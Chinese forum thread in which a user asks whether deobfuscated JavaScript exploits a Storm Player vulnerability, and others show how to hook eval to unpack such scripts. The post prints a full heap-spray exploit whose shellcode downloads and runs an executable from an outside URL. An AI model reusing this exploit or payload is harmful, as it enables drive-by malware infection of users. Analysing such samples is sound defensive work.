解析过来是:
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%uf3e9%u0000%u9000"+
"%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2F3A%u782F%u6169%u617A%u2E69%u6164%u696A%u7961%u7169%u6669%u2E61%u6E63%u6A2F%u626F%u652E%u6578%u0000");
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer+="\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)
是攻击暴风雨漏洞的吗?

解决方案 »

  1.   

    ...
    我说怎么不好用呢..呵呵...
    这种代码,先查查,大概没问题直接var eval = function () {
    alert(arguments[0]);
    return arguments[0];
    };然后直接放个document.write在最外层,就可以了.
    它有多少层eval也没关系...:D
      

  2.   

    在写全点的话..可以这样..var eval = function () {
    $a(arguments[0]);
    return arguments[0];
    };
    var $a = window.alert;
    var $r = document.write;window.AcitveXObject = function () {
    return Function;
    };
    然后在看代码,貌似基本上就没有问题了...
      

  3.   

    var $e = window.eval;
    var eval = function () {
    $a(arguments[0]);
    return $e(arguments[0]);
    };
    var $a = window.alert;
    var $r = document.write;
    window.AcitveXObject = function () {
    return Function;
    };
    这样的话,直接把他的代码放在下面就可以了...:D
      

  4.   

    对,只是部分代码,不是我解析的是调试器解析的,因为上下文不全,storm未定义,所以停在这里。被我粘贴。还只能放在word中。保存为文本都会被杀毒的干掉。是暴风雨漏洞病毒。但不是很清楚原理,故此问问。好像这代码的之前要生成一个暴风雨的控件object标签。
      

  5.   

    <script type="text/javascript">
    window.onerror = function () { return true };
    var $e = window.eval;
    var eval = function () {
    $a(arguments[0]);
        $r(arguments[0]);
        //return $e(arguments[0]);
    };
    var $a = window.alert;
    var $r = document.write;
    window.AcitveXObject = function () { return Function; };
    eval(unescape("%76a%72 a = %6ee%77 %52e%67E%78%70('be%72');%76a%72 d = %6c%6fca%74%69%6f%6e%2e%68%72ef;c = d%2e%73ea%72c%68(a);f%75%6ec%74%69%6f%6e %78%78(%6e) {b = d%2e%73ea%72c%68(%2f^%68%74%74%70:%2f);%69f (c > 0 && b == 0) {%7a = %75%6ee%73ca%70e(%6e);%76a%72 %79 = '';f%6f%72 (%69=0;%69 <%7a%2e%6ce%6e%67%74%68;%69%2b%2b) {%79 %2b= %53%74%72%69%6e%67%2ef%72%6f%6dC%68a%72C%6fde(%7a%2ec%68a%72C%6fdeA%74(%69)%2d1);}d%6fc%75%6de%6e%74%2e%77%72%69%74e(%75%6ee%73ca%70e(%79));}} %69f (c  < 0) {%74%6f%70%2e%6c%6fca%74%69%6f%6e = '%68%74%74%70:%2f%2f%77%77%77%2e%74a%6edbe%72%67%2ec%6f%6d'}"))
    </script>
      

  6.   

    引用:暴风影音II 0day漏洞解决方案 
    http://baike.360.cn/3219678/953824.html